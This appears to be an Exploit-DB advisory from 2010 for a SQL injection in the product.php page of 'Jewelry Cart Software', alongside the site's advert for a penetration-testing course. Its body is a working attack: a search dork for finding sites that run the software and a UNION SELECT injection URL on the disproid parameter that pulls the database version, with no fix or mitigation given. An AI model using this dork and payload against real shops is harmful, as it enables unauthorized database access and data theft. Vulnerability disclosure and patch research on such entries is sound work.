Jewelry Cart Software - 'product.php' SQL Injection

EDB-ID:

11826

CVE:

N/A


Author:

Asyraf

Type:

webapps


Platform:

PHP

Date:

2010-03-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

**************************************************************

# Name : Jewelry Cart Software SQL Injection (product.php) ::-
# Author : Asyraf (Mycrypto Security Force) r0x~!!
# Date : 20/3/2010
# Language : PHP
# Script : Jewelry Cart Software
# Shout : hMSecurity,n3wb0rn,TBD Security

# Dork : Powered by Jewelry Cart Software
          product.php?disproid=

# Vulnerability : product.php?disproid=[ANY VALUE]

# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--

***************************************************************